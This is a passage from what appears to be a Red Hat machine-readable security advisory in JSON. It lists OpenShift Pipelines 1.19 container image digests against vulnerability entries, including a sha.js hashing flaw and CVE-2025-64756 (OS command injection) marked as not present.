"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "sha.js: Missing type checks leading to hash rewind and passing on crafted data"
},
{
"cve": "CVE-2025-64756",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2025-11-17T18:01:28.077927+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
